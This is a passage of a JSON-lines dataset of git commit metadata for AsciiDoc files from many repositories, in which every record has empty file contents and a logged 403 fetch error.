Build&Run instructions","message":"Add README with basic Build&Run instructions\n","repos":"msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/bitcoinj-addons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ade2219b32c95c0cf35831c816dbd54e2756292","subject":"Adding an (empty) README file","message":"Adding an (empty) README file\n","repos":"jponge\/vertx-gradle-plugin,jponge\/vertx-gradle-plugin,jponge\/vertx-gradle-plugin,jponge\/vertx-gradle-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jponge\/vertx-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19b47c1a65f49c436a1e2aca08050ad0cdee5c75","subject":"test links","message":"test links\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3350688ae7945fdfcc5f711e07b9cecbe5d2549d","subject":"add readme","message":"add readme\n","repos":"araraloren\/Net-FTPlib,araraloren\/Net-FTPlib","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araraloren\/Net-FTPlib.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b0958bbac6ce555618e6fb9a0abeb6af4f9782e","subject":"Updated to the new bridge_common repository path","message":"Updated to the new bridge_common repository path\n","repos":"r0h4n\/node-agent,Tendrl\/node_agent,Tendrl\/node_agent,Tendrl\/node-agent,Tendrl\/node-agent,r0h4n\/node-agent,r0h4n\/node-agent,Tendrl\/node-agent","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/r0h4n\/node-agent.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"f96198504551ef4d785e7149a574b68a4cf6ff78","subject":"Create README.adoc","message":"Create README.adoc\n","repos":"teacurran\/personal-api,teacurran\/personal-api,teacurran\/personal-api","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teacurran\/personal-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d453415abd0e697704c896fcb0261f4869c46e27","subject":"readme","message":"readme\n","repos":"harsha-mudi\/rdp,harsha-mudi\/rdp,harsha-mudi\/rdp-js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harsha-mudi\/rdp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a6beb7c0f4d389db0e93f8d36135b1aabf9c4f6","subject":"Update 2016-07-14-Testing-Getting-closer.adoc","message":"Update 2016-07-14-Testing-Getting-closer.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-07-14-Testing-Getting-closer.adoc","new_file":"_posts\/2016-07-14-Testing-Getting-closer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d02e63c6520bade41cdf3dc3bcda7cf6216be84","subject":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","message":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f15160ac65fdd9d433daa666b059d6cb7acfed4","subject":"Update 2017-06-12-neural_networks_training_basics.adoc","message":"Update 2017-06-12-neural_networks_training_basics.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cc79f698081defe2d91a1794526fd7dc0790b01","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6193e65734d1abe91fb2a07c586b7d2747866b70","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fda55718a860379784433a93bd718b0cc6deccc5","subject":"Publish 2013-5-12-Test-Notes.adoc","message":"Publish 2013-5-12-Test-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2013-5-12-Test-Notes.adoc","new_file":"2013-5-12-Test-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb6474cb88b4d2a665f7dce879130512d96c1813","subject":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad7ad38c45f34025b5b026f49b163940caeef430","subject":"release notes improvements","message":"release notes improvements\n","repos":"bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,bibryam\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.0.adoc","new_file":"download\/releaseNotes\/releaseNotes6.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ccd507c985d6154dfe023586296125f3b544950","subject":"Update 2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","message":"Update 2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","new_file":"_posts\/2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"232e4509291832b10f4576baaf012ff902cc6c00","subject":"Correct user guide env->profile","message":"Correct user guide env->profile\n","repos":"mstine\/spring-cloud-config,royclarkson\/spring-cloud-config,marbon87\/spring-cloud-config,marbon87\/spring-cloud-config,rajkumargithub\/spring-cloud-config,appleman\/spring-cloud-config,psbateman\/spring-cloud-config,fkissel\/spring-cloud-config,thomasdarimont\/spring-cloud-config,spring-cloud\/spring-cloud-config,psbateman\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,fangjing828\/spring-cloud-config,fkissel\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,thomasdarimont\/spring-cloud-config,royclarkson\/spring-cloud-config,spring-cloud\/spring-cloud-config,appleman\/spring-cloud-config,royclarkson\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,shakuzen\/spring-cloud-config,spring-cloud\/spring-cloud-config,mstine\/spring-cloud-config,shakuzen\/spring-cloud-config,fangjing828\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mbenson\/spring-cloud-config,shakuzen\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c39b576e165509a253fdc888684e565fa1d6dc9","subject":"Update 2015-11-25-Migra-tu-usuario-entre-servidores-Linux.adoc","message":"Update 2015-11-25-Migra-tu-usuario-entre-servidores-Linux.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-25-Migra-tu-usuario-entre-servidores-Linux.adoc","new_file":"_posts\/2015-11-25-Migra-tu-usuario-entre-servidores-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e808fe440c56c0e711710d6ddf314b35672bc8c5","subject":"Update 2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc","message":"Update 2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc","new_file":"_posts\/2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae271d2b4b7a02b852c0361c67f45df53a4b9fe7","subject":"Update 2017-12-29-work-it-on-not.adoc","message":"Update 2017-12-29-work-it-on-not.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-12-29-work-it-on-not.adoc","new_file":"_posts\/2017-12-29-work-it-on-not.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28348aa845a52f7239a4c2baf301e4c38399c506","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f81f3fb4196ed553f94141e51a17f5a8ded8bd89","subject":"y2b create post HTC One X+ Unboxing \\u0026 Overview","message":"y2b create post HTC One X+ Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-03-HTC-One-X-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-01-03-HTC-One-X-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2155978838ab985f70f71666cd210bef96b9955","subject":"add pydoc_links.adoc","message":"add pydoc_links.adoc\n","repos":"jerodg\/hackerrank-python","old_file":"pydoc_links.adoc","new_file":"pydoc_links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jerodg\/hackerrank-python.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba74f803bbc9103be526da20a0a83d019e4fd900","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddc7b8a2fa129192a9f2fca6561d17959f6628b5","subject":"Update 2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","message":"Update 2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_file":"_posts\/2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5464d19f3a39e6f8a83ae1c16593a17141f3da7c","subject":"adding some clarifications","message":"adding some clarifications\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2ef781d4813ae6c390a2825fb412dd6b276b70d","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b68c48d2c6e9204a51f3875d9370869789625f62","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d0fb503142103a36968206bf9727e55144bef9c","subject":"doc v2.27 release notes","message":"doc v2.27 release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c439d054eb1ee3f123d087297410eb140b9b2149","subject":"Update 2016-10-02-Simple-Comforting-Granola.adoc","message":"Update 2016-10-02-Simple-Comforting-Granola.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-10-02-Simple-Comforting-Granola.adoc","new_file":"_posts\/2016-10-02-Simple-Comforting-Granola.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7fe866fff42ba3af48324e9cb8ec062f97d6893","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bcc9931d5724f02734803baed15024ea1516b99","subject":"Update 2017-05-24-Pwnablekr-UAF-Writeup.adoc","message":"Update 2017-05-24-Pwnablekr-UAF-Writeup.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Pwnablekr-UAF-Writeup.adoc","new_file":"_posts\/2017-05-24-Pwnablekr-UAF-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0aef923e4928d7d404f7bc882b40aa639f7d8f0","subject":"Added Eips directory in camel-core and added Aggregate doc page","message":"Added Eips directory in camel-core and added Aggregate doc page\n","repos":"acartapanis\/camel,tlehoux\/camel,RohanHart\/camel,acartapanis\/camel,NickCis\/camel,lburgazzoli\/camel,akhettar\/camel,gnodet\/camel,mcollovati\/camel,lburgazzoli\/camel,Fabryprog\/camel,driseley\/camel,objectiser\/camel,RohanHart\/camel,nboukhed\/camel,chirino\/camel,akhettar\/camel,snurmine\/camel,nboukhed\/camel,gnodet\/camel,punkhorn\/camel-upstream,pax95\/camel,isavin\/camel,DariusX\/camel,rmarting\/camel,objectiser\/camel,dmvolod\/camel,drsquidop\/camel,driseley\/camel,yuruki\/camel,gnodet\/camel,dmvolod\/camel,tdiesler\/camel,lburgazzoli\/camel,drsquidop\/camel,tadayosi\/camel,cunningt\/camel,Thopap\/camel,rmarting\/camel,driseley\/camel,pax95\/camel,pkletsko\/camel,mgyongyosi\/camel,mgyongyosi\/camel,prashant2402\/camel,nicolaferraro\/camel,anton-k11\/camel,tadayosi\/camel,gnodet\/camel,sverkera\/camel,jkorab\/camel,mgyongyosi\/camel,CodeSmell\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,lburgazzoli\/camel,allancth\/camel,akhettar\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,jkorab\/camel,isavin\/camel,snurmine\/camel,zregvart\/camel,chirino\/camel,RohanHart\/camel,lburgazzoli\/apache-camel,yuruki\/camel,drsquidop\/camel,anoordover\/camel,akhettar\/camel,alvinkwekel\/camel,onders86\/camel,drsquidop\/camel,sverkera\/camel,chirino\/camel,Thopap\/camel,tadayosi\/camel,pax95\/camel,tadayosi\/camel,alvinkwekel\/camel,curso007\/camel,tdiesler\/camel,zregvart\/camel,sverkera\/camel,NickCis\/camel,pmoerenhout\/camel,kevinearls\/camel,Fabryprog\/camel,RohanHart\/camel,allancth\/camel,tdiesler\/camel,CodeSmell\/camel,scranton\/camel,pkletsko\/camel,curso007\/camel,jonmcewen\/camel,apache\/camel,christophd\/camel,lburgazzoli\/camel,isavin\/camel,mcollovati\/camel,mgyongyosi\/camel,DariusX\/camel,dmvolod\/camel,tdiesler\/camel,akhettar\/camel,chirino\/camel,prashant2402\/camel,ullgren\/camel,pmoerenhout\/camel,davidkarlsen\/camel,rmarting\/camel,onders86\/camel,Thopap\/camel,nikhilvibhav\/camel,rmarting\/camel,NickCis\/camel,nicolaferraro\/camel,prashant2402\/camel,cunningt\/camel,lburgazzoli\/camel,Thopap\/camel,nicolaferraro\/camel,kevinearls\/camel,nikhilvibhav\/camel,mcollovati\/camel,kevinearls\/camel,driseley\/camel,onders86\/camel,kevinearls\/camel,jonmcewen\/camel,christophd\/camel,cunningt\/camel,jamesnetherton\/camel,sverkera\/camel,apache\/camel,anton-k11\/camel,zregvart\/camel,objectiser\/camel,adessaigne\/camel,apache\/camel,lburgazzoli\/apache-camel,CodeSmell\/camel,CodeSmell\/camel,christophd\/camel,isavin\/camel,nboukhed\/camel,acartapanis\/camel,jkorab\/camel,christophd\/camel,yuruki\/camel,yuruki\/camel,adessaigne\/camel,DariusX\/camel,davidkarlsen\/camel,acartapanis\/camel,gautric\/camel,curso007\/camel,prashant2402\/camel,drsquidop\/camel,anoordover\/camel,isavin\/camel,NickCis\/camel,objectiser\/camel,RohanHart\/camel,snurmine\/camel,dmvolod\/camel,jonmcewen\/camel,snurmine\/camel,chirino\/camel,onders86\/camel,tlehoux\/camel,alvinkwekel\/camel,anoordover\/camel,mgyongyosi\/camel,acartapanis\/camel,kevinearls\/camel,cunningt\/camel,scranton\/camel,tlehoux\/camel,allancth\/camel,pax95\/camel,mgyongyosi\/camel,driseley\/camel,Thopap\/camel,Fabryprog\/camel,lburgazzoli\/apache-camel,pax95\/camel,jonmcewen\/camel,punkhorn\/camel-upstream,anton-k11\/camel,drsquidop\/camel,onders86\/camel,nboukhed\/camel,pmoerenhout\/camel,gautric\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,yuruki\/camel,jamesnetherton\/camel,apache\/camel,pax95\/camel,isavin\/camel,curso007\/camel,pkletsko\/camel,cunningt\/camel,mcollovati\/camel,sverkera\/camel,cunningt\/camel,lburgazzoli\/apache-camel,adessaigne\/camel,tlehoux\/camel,snurmine\/camel,adessaigne\/camel,scranton\/camel,jonmcewen\/camel,tlehoux\/camel,apache\/camel,salikjan\/camel,driseley\/camel,zregvart\/camel,christophd\/camel,yuruki\/camel,pkletsko\/camel,snurmine\/camel,tlehoux\/camel,pmoerenhout\/camel,davidkarlsen\/camel,christophd\/camel,NickCis\/camel,NickCis\/camel,alvinkwekel\/camel,jkorab\/camel,pkletsko\/camel,pkletsko\/camel,nikhilvibhav\/camel,gautric\/camel,jkorab\/camel,jonmcewen\/camel,chirino\/camel,scranton\/camel,allancth\/camel,onders86\/camel,gautric\/camel,anton-k11\/camel,anton-k11\/camel,scranton\/camel,tadayosi\/camel,jamesnetherton\/camel,ullgren\/camel,nboukhed\/camel,anoordover\/camel,dmvolod\/camel,jamesnetherton\/camel,anoordover\/camel,tdiesler\/camel,gautric\/camel,adessaigne\/camel,DariusX\/camel,ullgren\/camel,curso007\/camel,Thopap\/camel,jkorab\/camel,gautric\/camel,RohanHart\/camel,nicolaferraro\/camel,rmarting\/camel,scranton\/camel,Fabryprog\/camel,tadayosi\/camel,allancth\/camel,nikhilvibhav\/camel,anoordover\/camel,allancth\/camel,punkhorn\/camel-upstream,sverkera\/camel,jamesnetherton\/camel,anton-k11\/camel,ullgren\/camel,acartapanis\/camel,dmvolod\/camel,salikjan\/camel,nboukhed\/camel,prashant2402\/camel,prashant2402\/camel,akhettar\/camel,rmarting\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,curso007\/camel,kevinearls\/camel,gnodet\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/aggregate-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/aggregate-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"656e5dde40a98707220f6c2046246e98a6cd1e02","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d962094ef1e8c1fec46c440881d519dc760f55f8","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/Windows Search.asciidoc","new_file":"documentation\/Windows Search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17599f000af3d40bc7901d6e694d1222be1c8677","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a387a57b3b98aa3c086eebbef293d358ca46811","subject":"Update 2017-04-28-Grammar-Nazi.adoc","message":"Update 2017-04-28-Grammar-Nazi.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-28-Grammar-Nazi.adoc","new_file":"_posts\/2017-04-28-Grammar-Nazi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38c4d3138af7f06db3eadae72e7a01ccff843f4a","subject":"add 404 page","message":"add 404 